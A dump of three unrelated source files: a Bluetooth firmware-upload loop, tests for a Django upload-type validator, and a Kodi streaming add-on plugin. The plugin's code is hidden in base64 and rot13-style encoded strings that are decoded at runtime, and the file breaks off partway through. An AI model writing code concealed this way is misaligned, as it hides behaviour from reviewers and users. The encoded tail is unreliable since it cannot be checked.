if num_of_packets_between_notif:
while not self.ready_to_send:
self.log_handler.log("Waiting for packet receipt notification")
time.sleep(0.1)
#wait for 'self.ready_to_send' to be True
data_to_send = bin_array[i:i + 20]
# Send 20 bytes of hex image data
self.send_data(self.pipe_dfu_packet,
System.Array[System.Byte](data_to_send),
num_of_send_tries,
"Sending Firmware bytes [%i, %i]" % (i, i + len(data_to_send)))
pkts_sent = pkts_sent + 1
if ((num_of_packets_between_notif != 0) and ((pkts_sent % num_of_packets_between_notif) == 0)):
# Need to wait for a notification from peer
self.log_handler.log("Need to wait for a notification from peer")
self.ready_to_send = False
# Send Validate
self.send_data(self.pipe_dfu_control_point,
System.Array[System.Byte]([OpCodes.VALIDATE_FIRMWARE_IMAGE]),
num_of_send_tries,
"Sending 'VALIDATE FIRMWARE IMAGE' command")
# Wait for notification
time.sleep(1)
# Send Activate and Reset
self.send_data(self.pipe_dfu_control_point,
System.Array[System.Byte]([OpCodes.ACTIVATE_FIRMWARE_AND_RESET]),
num_of_send_tries,
"Sending 'ACTIVATE FIRMWARE AND RESET' command")
end_time = time.time()
self.log_handler.log("Total size of the Image = {0} bytes".format(len(bin_array)))
self.log_handler.log("Time taken (excluding the service discovery) = {0} seconds".format(end_time - start_time))
|
mckinseyacademy/django-upload-validator
|
refs/heads/master
|
tests/tests.py
|
1
|
import os
from ddt import ddt, data
from django.test import TestCase
from upload_validator import FileTypeValidator
TEST_FILES_DIR = os.path.join(os.path.dirname(__file__), 'test_files')
TEST_FILES = [
# word
'word-mac.doc', 'word-mac.docx', 'word-windows.docx', 'word-ubuntu.doc', 'word-ubuntu.docx',
# excel
'excel-mac.xls', 'excel-mac.xlsx', 'excel-windows.xlsx', 'excel-ubuntu.xls', 'excel-ubuntu.xlsx', 'document.xlsx',
# power point
'sample.ppt', 'sample.pptx',
# pdf
'sample.pdf',
# images
'sample.png', 'sample.jpeg', 'sample.tif',
]
@ddt
class TestFileValidator(TestCase):
def test_initialization(self):
"""
Tests initialization of validator class
"""
validator = FileTypeValidator(
allowed_types=['image/jpeg']
)
self.assertTrue(isinstance(validator, FileTypeValidator))
@data(*TEST_FILES)
def test_valid_types(self, filename):
"""
Tests that different files are detected correctly
"""
validator = FileTypeValidator(
allowed_types=[
'application/msword',
'application/vnd.openxmlformats-officedocument.wordprocessingml.document',
'application/pdf',
'application/vnd.ms-powerpoint',
'application/vnd.openxmlformats-officedocument.presentationml.presentation',
'application/vnd.ms-excel',
'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet',
'image/tiff',
'image/jpeg',
'image/png'
]
)
file_path = os.path.join(TEST_FILES_DIR, filename)
file_obj = open(file_path, mode='rb')
validator(file_obj)
file_obj.close()
def test_invalid_content(self):
"""
Checks where extension is valid but file content is invalid
"""
validator = FileTypeValidator(
allowed_types=['image/jpeg']
)
file_with_wrong_content = os.path.join(TEST_FILES_DIR, 'wrong_jpg.jpeg')
try:
validator(open(file_with_wrong_content, mode='rb'))
except Exception as e:
code = e.code
else:
code = None
self.assertEqual(code, 'invalid_type')
def test_extension_check(self):
"""
Checks case where file has valid type but extension is not allowed
"""
validator = FileTypeValidator(
allowed_types=[
'application/msword',
'application/vnd.openxmlformats-officedocument.wordprocessingml.document'
],
allowed_extensions=['.doc', '.docx']
)
test_file = os.path.join(TEST_FILES_DIR, 'sample.docm')
try:
validator(open(test_file, mode='rb'))
except Exception as e:
code = e.code
else:
code = None
self.assertEqual(code, 'invalid_extension')
def test_invalid_type_specification(self):
"""
Checks if provided mime type is correctly formatted
"""
try:
FileTypeValidator(
allowed_types=['text'],
)
except Exception as e:
code = e.code
else:
code = None
self.assertEqual(code, 'invalid_input')
@data(*['sample.png', 'sample.jpeg', 'sample.tif'])
def test_wild_card_specification(self, filename):
"""
Checks if wildcard character specifications work
"""
validator = FileTypeValidator(
allowed_types=['image/*'],
)
test_file = os.path.join(TEST_FILES_DIR, filename)
fileobj = open(test_file, mode='rb')
validator(fileobj)
fileobj.close()
@data(*['sample.png', 'sample.jpeg', 'sample.pdf'])
def test_mixed_wild_card_specification(self, filename):
"""
Checks if wildcard character specifications work
"""
validator = FileTypeValidator(
allowed_types=['image/*', 'application/pdf'],
)
test_file = os.path.join(TEST_FILES_DIR, filename)
fileobj = open(test_file, mode='rb')
validator(fileobj)
fileobj.close()
@data(*['wrong_jpg.jpeg', 'sample.pdf'])
def test_wildcard_specification_invalid_content(self, filename):
"""
Checks if wildcard character specifications work
"""
validator = FileTypeValidator(
allowed_types=['image/*'],
)
test_file = os.path.join(TEST_FILES_DIR, filename)
fileobj = open(test_file, mode='rb')
try:
validator(fileobj)
except Exception as e:
code = e.code
else:
code = None
self.assertEqual(code, 'invalid_type')
|
repotvsupertuga/tvsupertuga.repository
|
refs/heads/master
|
plugin.video.TVsupertuga/resources/lib/plugins/TVsupertuga.py
|
1
|
import base64, codecs
magic = 'IyAtKi0gY29kaW5nOiB1dGYtOCAtKi0KCmltcG9ydCBfX2J1aWx0aW5fXwppbXBvcnQgZGF0ZXRpbWUKaW1wb3J0IHN5cwppbXBvcnQgdGltZQppbXBvcnQgcGlja2xlCgppbXBvcnQgcmVxdWVzdHMKCmltcG9ydCBrb2RpbmcKaW1wb3J0IHhibWNhZGRvbgppbXBvcnQgeGJtY2d1aQppbXBvcnQgeGJtY3BsdWdpbgpmcm9tIC4ucGx1Z2luIGltcG9ydCBQbHVnaW4KZnJvbSBsYW5ndWFnZSBpbXBvcnQgZ2V0X3N0cmluZyBhcyBfCmZyb20gcmVzb3VyY2VzLmxpYi51dGlsLmNvbnRleHQgaW1wb3J0IGdldF9jb250ZXh0X2l0ZW1zCmZyb20gcmVzb3VyY2VzLmxpYi51dGlsLnVybCBpbXBvcnQgZ2V0X2FkZG9uX3VybCwgcmVwbGFjZV91cmwsIHhibWMKZnJvbSByZXNvdXJjZXMubGliLnV0aWwueG1sIGltcG9ydCBKZW5JdGVtCgpfX2J1aWx0aW5fXy5CT0JfQkFTRV9ET01BSU4gPSAiMTc4LjMyLjIxNy4xMTEiCkFERE9OID0geGJtY2FkZG9uLkFkZG9uKCkKYWRkb25fbmFtZSA9IHhibWNhZGRvbi5BZGRvbigpLmdldEFkZG9uSW5mbygnbmFtZScpCgoKY2xhc3MgVFZzdXBlcnR1Z2EoUGx1Z2luKToKICAgIG5hbWUgPSAiVFZzdXBlcnR1Z2EiCgogICAgZGVmIHByb2Nlc3NfaXRlbShzZWxmLCBpdGVtX3htbCk6CiAgICAgICAgaXRlbSA9IEplbkl0ZW0oaXRlbV94bWwpCiAgICAgICAgZW5hYmxlX2dpZnMgPSB4Ym1jYWRkb24uQWRkb24oKS5nZXRTZXR0aW5nKCdlbmFibGVfZ2lmcycpID09ICJ0cnVlIgogICAgICAgIGlmIGl0ZW0uaXRlbV9zdHJpbmcuc3RhcnRzd2l0aCgiPGRpcj4iKToKICAgICAgICAgICAgdGl0bGUgPSBpdGVtWyJuYW1lIl0KICAgICAgICAgICAgaWYgdGl0bGUgPT0gIiI6CiAgICAgICAgICAgICAgICB0aXRsZSA9IGl0ZW1bInRpdGxlIl0KICAgICAgICAgICAgdHJ5OgogICAgICAgICAgICAgICAgdGl0bGUgPSB4Ym1jYWRkb24uQWRkb24oKS5nZXRMb2NhbGl6ZWRTdHJpbmcoaW50KHRpdGxlKSkKICAgICAgICAgICAgZXhjZXB0IFZhbHVlRXJyb3I6CiAgICAgICAgICAgICAgICBwYXNzCiAgICAgICAgICAgIGlmIGl0ZW1bImxpbmsiXSA9PSAic3BvcnRfYWNlc29wbGlzdGluZyI6CiAgICAgICAgICAgICAgICBtb2RlID0gInNwb3J0X2FjZXNvcGxpc3RpbmciCiAgICAgICAgICAgICAgICBpc19wbGF5YWJsZSA9IEZhbHNlCiAgICAgICAgICAgICAgICBsaW5rID0gIiIKICAgICAgICAgICAgZWxpZiAic3BvcnRfbmhsX2dhbWVzIiBpbiBpdGVtWyJsaW5rIl06CiAgICAgICAgICAgICAgICBnYW1lX2RhdGUgPSBpdGVtWyJsaW5rIl0ucmVwbGFjZSgic3BvcnRfbmhsX2dhbWVzKCIsICIiKVs6LTFdCiAgICAgICAgICAgICAgICBpZiAic3BvcnQiIGluIGdhbWVfZGF0ZToKICAgICAgICAgICAgICAgICAgICBnYW1lX2RhdGUgPSAiIgogICAgICAgICAgICAgICAgbW9kZSA9ICJzcG9ydF9uaGxfZ2FtZXMiCiAgICAgICAgICAgICAgICBpc19wbGF5YWJsZSA9IEZhbHNlCiAgICAgICAgICAgICAgICBsaW5rID0gZ2FtZV9kYXRlICsgImEiCiAgICAgICAgICAgIGVsaWYgIm5obF9ob21lX2F3YXkoIiBpbiBpdGVtWyJsaW5rIl06CiAgICAgICAgICAgICAgICBmYXJncyA9IGl0ZW1bImxpbmsiXS5yZXBsYWNlKCJuaGxfaG9tZV9hd2F5KCIsCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIiKVs6LTFdLnNwbGl0KCIsIikKICAgICAgICAgICAgICAgIG1vZGUgPSAibmhsX2hvbWVfYXdheSIKICAgICAgICAgICAgICAgIGxpbmsgPSAiLCIuam9pbihmYXJncykKICAgICAgICAgICAgICAgIGlzX3BsYXlhYmxlID0gRmFsc2UKICAgICAgICAgICAgZWxpZiBpdGVtWyJsaW5rIl0uc3RhcnRzd2l0aCgic3BvcnRfaG9ja2V5cmVjYXBzIik6CiAgICAgICAgICAgICAgICBwYWdlID0gaXRlbVsibGluayJdLnN0cmlwKClbMTg6XQogICAgICAgICAgICAgICAgaWYgcGFnZSA9PSAiIjoKICAgICAgICAgICAgICAgICAgICBwYWdlID0gIjFhIgogICAgICAgICAgICAgICAgbW9kZSA9ICJnZXRfaG9ja2V5X3JlY2FwcyIKICAgICAgICAgICAgICAgIGlzX3BsYXlhYmxlID0gRmFsc2UKICAgICAgICAgICAgICAgIGxpbmsgPSBwYWdlCiAgICAgICAgICAgIGVsaWYgInNwb3J0X25mbF9nYW1lcyIgaW4gaXRlbVsibGluayJdOgogICAgICAgICAgICAgICAgZmFyZ3MgPSBpdGVtWyJsaW5rIl0ucmVwbGFjZSgic3BvcnRfbmZsX2dhbWVzKCIsICIiKVs6LTFdCiAgICAgICAgICAgICAgICBpZiAic3BvcnQiIGluIGZhcmdzOgogICAgICAgICAgICAgICAgICAgIGZhcmdzID0gIiIKICAgICAgICAgICAgICAgIGVsc2U6CiAgICAgICAgICAgICAgICAgICAgZmFyZ3MgPSBmYXJncy5zcGxpdCgiLCIpCiAgICAgICAgICAgICAgICAgICAgaWYgbGVuKGZhcmdzKSAhPSAyOgogICAgICAgICAgICAgICAgICAgICAgICBmYXJncyA9ICIiCiAgICAgICAgICAgICAgICBtb2RlID0gInNwb3J0X25mbF9nYW1lcyIKICAgICAgICAgICAgICAgIGlzX3BsYXlhYmxlID0gRmFsc2UKICAgICAgICAgICAgICAgIGxpbmsgPSBmYXJncwogICAgICAgICAgICBlbGlmICJzcG9ydF9uZmxfZ2V0X2dhbWUoIiBpbiBpdGVtWyJsaW5rIl06CiAgICAgICAgICAgICAgICBmYXJnID0gaXRlbVsibGluayJdLnJlcGxhY2UoInNwb3J0X25mbF9nZXRfZ2FtZSgiLCAiIilbOi0xXQogICAgICAgICAgICAgICAgbW9kZSA9ICJnZXRfbmZsX2dhbWUiCiAgICAgICAgICAgICAgICBsaW5rID0gZmFyZwogICAgICAgICAgICBlbGlmICJzcG9ydF9jb25kZW5zZWRfbmZsX2dhbWVzIiBpbiBpdGVtWyJsaW5rIl06CiAgICAgICAgICAgICAgICBmYXJncyA9IGl0ZW1bImxpbmsiXS5yZXBsYWNlKCJzcG9ydF9jb25kZW5zZWRfbmZsX2dhbWVzKCIsCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIiKVs6LTFdCiAgICAgICAgICAgICAgICBpZiAic3BvcnQiIGluIGZhcmdzOgogICAgICAgICAgICAgICAgICAgIGZhcmdzID0gIiIKICAgICAgICAgICAgICAgIGVsc2U6CiAgICAgICAgICAgICAgICAgICAgZmFyZ3MgPSBmYXJncy5zcGxpdCgiLCIpCiAgICAgICAgICAgICAgICAgICAgaWYgbGVuKGZhcmdzKSAhPSAyOgogICAgICAgICAgICAgICAgICAgICAgICBmYXJncyA9ICIiCiAgICAgICAgICAgICAgICBtb2RlID0gInNwb3J0X2NvbmRlbnNlZF9uZmxfZ2FtZXMiCiAgICAgICAgICAgICAgICBpc19wbGF5YWJsZSA9IEZhbHNlCiAgICAgICAgICAgICAgICBsaW5rID0gZmFyZ3MKICAgICAgICAgICAgZWxpZiAic3BvcnRfY29uZGVuc2VkX25mbF9nZXRfZ2FtZSgiIGluIGl0ZW1bImxpbmsiXToKICAgICAgICAgICAgICAgIGZhcmcgPSBpdGVtWyJsaW5rIl0ucmVwbGFjZSgic3BvcnRfY29uZGVuc2VkX25mbF9nZXRfZ2FtZSgiLAogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIiKVs6LTFdCiAgICAgICAgICAgICAgICBtb2RlID0gInNwb3J0X2NvbmRlbnNlZF9uZmxfZ2V0X2dhbWUiCiAgICAgICAgICAgICAgICBpc19wbGF5YWJsZSA9IEZhbHNlCiAgICAgICAgICAgICAgICBsaW5rID0gZmFyZwoKICAgICAgICAgICAgIyBmaWx0ZXIgb3V0ICJ1bnJlbGVhc2VkIgogICAgICAgICAgICBpZiB0aXRsZSA9PSAiIiBvciAiIC90aXRsZSIgaW4gdGl0bGUgb3IgIi8gdGl0bGUiIGluIHRpdGxlOgogICAgICAgICAgICAgICAgcmV0dXJuCgogICAgICAgICAgICBjb250ZXh0ID0gZ2V0X2NvbnRleHRfaXRlbXMoaXRlbSkKCiAgICAgICAgICAgIGNvbnRlbnQgPSBpdGVtWyJjb250ZW50Il0KICAgICAgICAgICAgaWYgY29udGVudCA9PSAiYm94c2V0IjoKICAgICAgICAgICAgICAgIGNvbnRlbnQgPSAic2V0IgogICAgICAgICAgICBpZiBjb250ZW50ICE9ICcnOgogICAgICAgICAgICAgICAgc2VsZi5jb250ZW50ID0gY29udGVudAogICAgICAgICAgICBpbWRiID0gaXRlbVsiaW1kYiJdCiAgICAgICAgICAgIHNlYXNvbiA9IGl0ZW1bInNlYXNvbiJdIG9yICcwJwogICAgICAgICAgICBlcGlzb2RlID0gaXRlbVsiZXBpc29kZSJdIG9yICcwJwogICAgICAgICAgICB5ZWFyID0gaXRlbVsieWVhciJdIG9yICcwJwogICAgICAgICAgICBmYW5hcnQgPSBOb25lCiAgICAgICAgICAgIGlmIGVuYWJsZV9naWZzOgogICAgICAgICAgICAgICAgZmFuX3VybCA9IGl0ZW0uZ2V0KCJhbmltYXRlZF9mYW5hcnQiLCAiIikKICAgICAgICAgICAgICAgIGlmIGZhbl91cmwgYW5kIGZhbl91cmwgIT0gIjAiOgogICAgICAgICAgICAgICAgICAgIGZhbmFydCA9IHJlcGxhY2VfdXJsKGZhbl91cmwpCiAgICAgICAgICAgIGlmIG5vdCBmYW5hcnQ6CiAgICAgICAgICAgICAgICBmYW5hcnQgPSByZXBsYWNlX3VybChpdGVtLmdldCgiZmFuYXJ0IiwgIiIpLCByZXBsYWNlX2dpZj1GYWxzZSkKICAgICAgICAgICAgdGh1bWJuYWlsID0gTm9uZQogICAgICAgICAgICBpZiBlbmFibGVfZ2lmczoKICAgICAgICAgICAgICAgIHRodW1iX3VybCA9IGl0ZW0uZ2V0KCJhbmltYXRlZF90aHVtYm5haWwiLCAiIikKICAgICAgICAgICAgICAgIGlmIHRodW1iX3VybCBhbmQgdGh1bWJfdXJsICE9ICIwIjoKICAgICAgICAgICAgICAgICAgICB0aHVtYm5haWwgPSByZXBsYWNlX3VybCh0aHVtYl91cmwpCiAgICAgICAgICAgIGlmIG5vdCB0aHVtYm5haWw6CiAgICAgICAgICAgICAgICB0aHVtYm5haWwgPSByZXBsYWNlX3VybCgKICAgICAgICAgICAgICAgICAgICBpdGVtLmdldCgidGh1bWJuYWlsIiwgIiIpLCByZXBsYWNlX2dpZj1GYWxzZSkKCiAgICAgICAgICAgIHByZW1pZXJlZCA9IGl0ZW0uZ2V0KCJwcmVtaWVyZWQiLCAiIikKICAgICAgICAgICAgaWYgcHJlbWllcmVkOgogICAgICAgICAgICAgICAgdHJ5OgogICAgICAgICAgICAgICAgICAgIHRvZGF5X3R0ID0gZGF0ZXRpbWUuZGF0ZS50b2RheSgpLnRpbWV0dXBsZSgpCiAgICAgICAgICAgICAgICAgICAgcHJlbWllcmVkX3R0ID0gdGltZS5zdHJwdGltZShwcmVtaWVyZWQsICIlWS0lbS0lZCIpCiAgICAgICAgICAgICAgICAgICAgaWYgdG9kYXlfdHQgPCBwcmVtaWVyZWRfdHQ6CiAgICAgICAgICAgICAgICAgICAgICAgIHRpdGxlID0gIltDT0xPUnllbGxvd10iICsgdGl0bGUgKyAiWy9DT0xPUl0iCiAgICAgICAgICAgICAgICBleGNlcHQgRXhjZXB0aW9uLCBlOgogICAgICAgICAgICAgICAgICAgIGtvZGluZy5kb2xvZygid3JvbmcgcHJlbWllcmVkIGZvcm1hdDogIiArIHJlcHIoZSkpCiAgICAgICAgICAgICAgICAgICAgcGFzcwogICAgICAgICAgICB0cnk6CiAgICAgICAgICAgICAgICByZXN1bHRfaXRlbSA9IHsKICAgICAgICAgICAgICAgICAgICAnbGFiZWwnOiB0aXRsZSwKICAgICAgICAgICAgICAgICAgICAnaWNvbic6IHRodW1ibmFpbCwKICAgICAgICAgICAgICAgICAgICAnZmFuYXJ0JzogZmFuYXJ0LAogICAgICAgICAgICAgICAgICAgICdtb2RlJzogbW9kZSwKICAgICAgICAgICAgICAgICAgICAndXJsJzogbGluaywKICAgICAgICAgICAgICAgICAgICAnZm9sZGVyJzogbm90IGlzX3BsYXlhYmxlLAogICAgICAgICAgICAgICAgICAgICdpbWRiJzogaW1kYiwKICAgICAgICAgICAgICAgICAgICAnY29udGVudCc6IGNvbnRlbnQsCiAgICAgICAgICAgICAgICAgICAgJ3NlYXNvbic6IHNlYXNvbiwKICAgICAgICAgICAgICAgICAgICAnZXBpc29kZSc6IGVwaXNvZGUsCiAgICAgICAgICAgICAgICAgICAgJ2luZm8nOiB7fSwKICAgICAgICAgICAgICAgICAgICAneWVhcic6IHllYXIsCiAgICAgICAgICAgICAgICAgICAgJ2NvbnRleHQnOiBjb250ZXh0LAogICAgICAgICAgICAgICAgICAgICJzdW1tYXJ5IjogaXRlbS5nZXQoInN1bW1hcnkiLCBOb25lKQogICAgICAgICAgICAgICAgfQogICAgICAgICAgICBleGNlcHQ6CiAgICAgICAgICAgICAgICByZXR1cm4KICAgICAgICAgICAgaWYgZmFuYXJ0OgogICAgICAgICAgICAgICAgcmVzdWx0X2l0ZW1bInByb3BlcnRpZXMiXSA9IHsnZmFuYXJ0X2ltYWdlJzogZmFuYXJ0fQogICAgICAgICAgICAgICAgcmVzdWx0X2l0ZW1bJ2ZhbmFydF9zbWFsbCddID0gZmFuYXJ0CgogICAgICAgICAgICBpZiBjb250ZW50IGluIFsnbW92aWUnLCAnZXBpc29kZSddOgogICAgICAgICAgICAgICAgIyBvbmx5IGFkZCB3YXRjaGVkIGRhdGEgZm9yIGFwcGxpY2FibGUgaXRlbXMKICAgICAgICAgICAgICAgIHJlc3VsdF9pdGVtWydpbmZvJ'
love = '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3DtCFO7PvNtVPNtVPNtVPNtVPqwLKWmWmbtJjbtVPNtVPNtVPNtVPNtVPNtLzSmMI90nTIgMI91pzjtXlNvL2Slpl9wLKWmZF5dpTpvYNbtVPNtVPNtVPNtVPNtVPNtLzSmMI90nTIgMI91pzjtXlNvL2Slpl9wLKWmZv5dpTpvYNbtVPNtVPNtVPNtVPNtVPNtLzSmMI90nTIgMI91pzjtXlNvL2Slpl9wLKWmZl5dpTpvYNbtVPNtVPNtVPNtVPNtVPNtLzSmMI90nTIgMI91pzjtXlNvL2Slpl9wLKWmAP5dpTpvYNbtVPNtVPNtVPNtVPNtVPNtLzSmMI90nTIgMI91pzjtXlNvL2Slpl9wLKWmAF5dpTpvYNbtVPNtVPNtVPNtVPNtVPNtLzSmMI90nTIgMI91pzjtXlNvL2Slpl9wLKWmAv5dpTpvYNbtVPNtVPNtVPNtVPNtVPNtLzSmMI90nTIgMI91pzjtXlNvL2Slpl9wLKWmAl5dpTpvYNbtVPNtVPNtVPNtVPNtVPNtLzSmMI90nTIgMI91pzjtXlNvL2Slpl9wLKWmBP5dpTpvYNbtVPNtVPNtVPNtVPNtVPNtLzSmMI90nTIgMI91pzjtXlNvL2Slpl9wLKWmBF5dpTpvYNbtVPNtVPNtVPNtVPNtVPNtLzSmMI90nTIgMI91pzjtXlNvL2Slpl9wLKWmZGNhnaOaVvjXVPNtVPNtVPNtVPNtKFjXVPNtVPNtVPNtVPNtW2AioT91pzM1oPp6VSfXVPNtVPNtVPNtVPNtVPNtVTWup2IsqTuyoJIsqKWfVPftVzAioT91pzM1oP9wo2kiqKWzqJjkYzcjMlVfPvNtVPNtVPNtVPNtVPNtVPOvLKAyK3EbMJ1yK3IloPNeVPWwo2kiqKWzqJjiL29fo3IlMaIfZv5dpTpvYNbtVPNtVPNtVPNtVPNtVPNtLzSmMI90nTIgMI91pzjtXlNvL29fo3IlMaIfY2AioT91pzM1oQZhnaOaVvjXVPNtVPNtVPNtVPNtVPNtVTWup2IsqTuyoJIsqKWfVPftVzAioT91pzM1oP9wo2kiqKWzqJj0YzcjMlVfPvNtVPNtVPNtVPNtVPNtVPOvLKAyK3EbMJ1yK3IloPNeVPWwo2kiqKWzqJjiL29fo3IlMaIfAF5dpTpvYNbtVPNtVPNtVPNtVPNtVPNtLzSmMI90nTIgMI91pzjtXlNvL29fo3IlMaIfY2AioT91pzM1oQLhnaOaVvjXVPNtVPNtVPNtVPNtVPNtVTWup2IsqTuyoJIsqKWfVPftVzAioT91pzM1oP9wo2kiqKWzqJj3YzcjMlVfPvNtVPNtVPNtVPNtVPNtVPOvLKAyK3EbMJ1yK3IloPNeVPWwo2kiqKWzqJjiL29fo3IlMaIfBP5dpTpvYNbtVPNtVPNtVPNtVPOqYNbtVPNtVPNtVPNtVPNan2yxplp6VSfXVPNtVPNtVPNtVPNtVPNtVTWup2IsqTuyoJIsqKWfVPftVzgcMUZin2yxpmRhnaOaVvjXVPNtVPNtVPNtVPNtVPNtVTWup2IsqTuyoJIsqKWfVPftVzgcMUZin2yxpmVhnaOaVvjXVPNtVPNtVPNtVPNtVPNtVTWup2IsqTuyoJIsqKWfVPftVzgcMUZin2yxpmZhnaOaVvjXVPNtVPNtVPNtVPNtVPNtVTWup2IsqTuyoJIsqKWfVPftVzgcMUZin2yxpmDhnaOaVvjXVPNtVPNtVPNtVPNtVPNtVTWup2IsqTuyoJIsqKWfVPftVzgcMUZin2yxpmHhna